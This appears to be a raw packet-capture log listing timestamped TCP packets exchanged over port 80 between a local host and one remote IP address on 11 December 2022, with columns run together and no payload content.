                          Dec 11, 2022 09:25:06.471111059 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.471137047 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.471183062 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.471191883 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.471226931 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.471276045 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.491260052 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.491327047 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.491372108 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.491378069 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.491416931 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.491461992 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.491468906 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.491507053 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.491554022 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.491556883 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.491602898 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.491641998 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.491646051 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.491689920 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.491729975 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.491733074 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.491777897 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.491821051 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.491822004 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.491867065 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.491909027 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.491928101 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.491971016 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.492013931 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.492022991 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.492058992 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.492104053 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.492105961 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.492150068 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.492191076 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.492202997 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.492225885 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.492270947 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.492271900 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.492300987 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.492345095 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.492358923 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.492388010 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.492429018 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.492430925 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.492477894 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.492506027 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.492522955 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.492553949 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.492595911 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.492597103 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.492641926 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.492680073 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.492687941 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.492731094 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.492774010 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.492774963 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.492819071 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.492856026 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.492868900 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.492892027 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.492925882 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.492934942 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.492973089 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.493015051 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.493036032 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.493057966 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.493098974 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.493100882 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.493144989 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.493187904 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.493189096 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.493232012 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.493273973 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.493273973 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.493316889 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.493355036 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.493361950 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.493417025 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.493458986 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.493462086 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.493505001 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.493546963 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.493547916 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.493593931 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.493637085 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.493638992 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.493680954 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.493721008 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.493724108 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.493767977 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.493810892 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.493818045 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.493853092 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.493890047 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.493901014 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.493928909 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.493973970 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.493978977 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.494016886 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.494064093 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.494067907 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.494090080 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.494133949 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.494148970 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.494177103 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.494220018 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.494249105 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.494261980 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.494304895 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.494307041 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.494349957 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.494391918 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.494410038 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.494443893 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.494483948 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.494487047 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.494529963 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.494571924 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.494576931 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.494620085 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.494647026 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.494668007 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.494690895 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.494733095 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.494735956 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.494776011 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.494824886 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.494848013 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.494867086 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.494904995 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.494921923 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.494968891 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.495011091 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.495012045 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.495054007 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.495100021 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.495098114 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.495126963 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.495167971 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.495170116 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.495212078 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.495254993 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.495258093 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.495296955 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.495341063 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.495342970 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.495371103 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.495414972 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.495414972 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.495466948 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.495490074 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.495508909 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.495533943 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.495577097 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.495580912 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.495621920 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.495663881 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.495666027 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.495707989 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.495750904 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.495754004 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.495795012 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.495836973 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.496335030 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.516726017 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.516789913 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.516813040 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.516849041 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.516856909 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.516902924 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.516905069 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.516947031 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.516988039 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.516992092 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.517030001 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.517069101 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.517076969 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.517122984 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.517163992 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.517177105 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.517204046 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.517245054 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.517245054 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.517288923 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.517328978 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.517344952 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.517370939 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.517411947 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.517429113 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.517452955 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.517493963 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.517513037 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.517534018 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.517575026 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.517604113 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.517616034 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.517669916 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.517678022 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.517712116 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.517752886 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.517761946 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.517793894 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.517838001 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.517848015 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.517862082 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.517905951 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.517908096 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.517946959 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.517997026 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.518002987 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.518038034 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.518081903 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.518101931 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.518122911 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.518162966 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.518172979 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.518204927 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.518244028 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.518249035 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.518285990 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.518326998 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.518347025 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.518368006 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.518409014 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.518414974 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.518450022 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.518488884 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.518493891 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.518531084 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.518570900 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.518578053 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.518610954 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.518649101 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.518656969 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.518690109 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.518729925 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.518738031 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.518769979 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.518810034 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.518816948 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.518853903 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.518904924 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.518927097 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.518966913 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.519006014 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.519021988 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.519046068 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.519085884 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.519093037 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.519128084 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.519166946 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.519176006 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.519207954 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.519247055 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.519257069 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.519285917 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.519325972 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.519336939 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.519352913 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.519392967 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.519433022 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.519459963 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.519471884 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.519471884 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.519512892 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.519551992 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.519557953 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.519591093 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.519632101 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.519634008 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.519694090 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.519738913 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.519754887 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.519792080 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.519805908 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.519845963 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.519850969 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.519885063 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.519890070 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.519931078 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.519969940 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.519975901 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.520009995 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.520051003 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.520076990 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.520090103 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.520129919 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.520132065 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.520170927 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.520214081 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.520222902 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.520252943 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.520296097 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.520313025 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.520354986 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.520397902 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.520406961 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.520442009 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.520483971 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.520493984 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.520536900 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.520579100 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.520581961 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.520625114 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.520668030 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.520670891 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.520710945 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.520755053 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.520765066 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.520798922 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.520844936 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.520853996 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.520890951 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.520935059 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.520936966 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.520979881 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.521023035 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.521023989 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.521066904 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.521109104 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.521111012 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.521152973 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.521193027 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.521195889 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.521248102 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.521290064 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.521291971 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.521333933 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.521373034 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.521377087 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.521420002 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.521461964 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.521464109 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.521523952 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.521565914 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.521569967 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.521612883 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.521653891 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.521661043 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.541642904 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.541676998 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.541704893 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.541735888 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.541745901 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.541779041 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.541784048 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.541826010 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.541829109 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.541873932 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.541874886 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.541913986 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.542037010 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.542084932 CET4969280192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:06.542097092 CET8049692131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:06.542139053 CET4969280192.168.2.3131.188.40.189
